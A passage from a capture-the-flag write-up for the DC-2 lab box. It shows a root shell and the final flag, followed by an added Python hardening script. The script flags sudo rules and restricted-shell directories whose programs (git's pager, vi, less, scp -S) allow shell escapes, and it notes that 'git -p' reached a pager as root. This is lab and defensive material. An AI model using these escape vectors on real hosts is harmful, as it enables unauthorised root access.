valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:b4:be:cb brd ff:ff:ff:ff:ff:ff
inet 192.168.56.110/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:feb4:becb/64 scope link
valid_lft forever preferred_lft forever
root@DC-2:/home/jerry# cd ~
root@DC-2:~# ls -la
total 32
drwx------ 2 root root 4096 Mar 21 2019 .
drwxr-xr-x 21 root root 4096 Mar 10 2019 ..
-rw------- 1 root root 207 Mar 21 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 427 Mar 21 2019 final-flag.txt
-rw------- 1 root root 46 Mar 21 2019 .lesshst
-rw------- 1 root root 232 Mar 21 2019 .mysql_history
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

Rooted.
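Two hardening checks for what the privilege escalation above and the rbash section before it relied on, as an added example that is not part of the original writeup: parse sudo -l output for NOPASSWD rules on programs that spawn a pager or editor, and list which symlinks in a restricted user's PATH directory can break out of rbash. The sudo -l text and the contents of tom's ~/usr/bin are re-typed from the writeup as constructed inputs; the NOEXEC tag is sudoers' documented mitigation, not something the box uses.

```python
"""Audit the two host-side weaknesses the box leans on: a sudo rule for a
command that spawns a pager, and an rbash "allowed commands" directory
containing editors and pagers.

Added example, not from the original writeup. The inputs are the box's
`sudo -l` and `ls -la ~/usr/bin` text, re-typed here as constructed strings.
"""
import re

# Programs that hand the caller a child shell (editor :shell, pager !cmd,
# pager launched by git, scp -S <program>). Any of these in a sudo rule or
# in a restricted user's PATH breaks the "one program only" assumption.
SHELL_ESCAPE_CMDS = {
    "git": "launches a pager (git -p / core.pager) that can run commands",
    "vi": "editor: can set shell= and spawn it",
    "vim": "editor: can set shell= and spawn it",
    "less": "pager: '!' runs a shell command",
    "more": "pager: '!' runs a shell command",
    "man": "shows pages through a pager",
    "scp": "-S <program> runs an arbitrary program",
}

SUDO_RULE_RE = re.compile(
    r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def audit_sudo_l(text):
    """Parse `sudo -l` output. Returns (findings, env_hardened): each finding
    is (runas, tags, command, reason); env_hardened says whether the Defaults
    carry both env_reset and secure_path."""
    findings, defaults, in_rules = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Matching Defaults entries"):
            in_rules = False
            continue
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            defaults.append(line)
            continue
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmd = m.group("runas"), m.group("tags").strip(), m.group("cmd")
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if cmd == "ALL":
            reasons.append("ALL: any command")
        elif binary in SHELL_ESCAPE_CMDS and "NOEXEC" not in tags:
            reasons.append(f"{binary} {SHELL_ESCAPE_CMDS[binary]}; "
                           "add the NOEXEC tag or restrict to a subcommand")
        if "NOPASSWD" in tags and runas.split(":")[0].strip() in ("root", "ALL"):
            reasons.append("NOPASSWD as root: no password gate before root")
        if reasons:
            findings.append((runas, tags, cmd, "; ".join(reasons)))
    joined = " ".join(defaults)
    env_hardened = "env_reset" in joined and "secure_path=" in joined
    return findings, env_hardened


def audit_restricted_bin(symlinks):
    """symlinks: {name: target} for the directory an rbash user's PATH points
    at. Returns the names that let the user leave the restricted shell."""
    return sorted(name for name, target in symlinks.items()
                  if name in SHELL_ESCAPE_CMDS
                  or target.rsplit("/", 1)[-1] in SHELL_ESCAPE_CMDS)


# Constructed from the writeup's output (not captured by this script).
SUDO_L_JERRY = r"""Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
"""
TOM_USR_BIN = {"less": "/usr/bin/less", "ls": "/bin/ls",
               "scp": "/usr/bin/scp", "vi": "/usr/bin/vi"}

if __name__ == "__main__":
    rules, hardened = audit_sudo_l(SUDO_L_JERRY)
    # env_reset did block PAGER on the box, yet `git -p help config` still
    # reached a pager: environment filtering alone does not fix this rule.
    print("sudo env hardened:", hardened)
    for runas, tags, cmd, why in rules:
        print(f"RISK ({runas}) {tags} {cmd}: {why}")
    print("rbash escapes via:", audit_restricted_bin(TOM_USR_BIN))
```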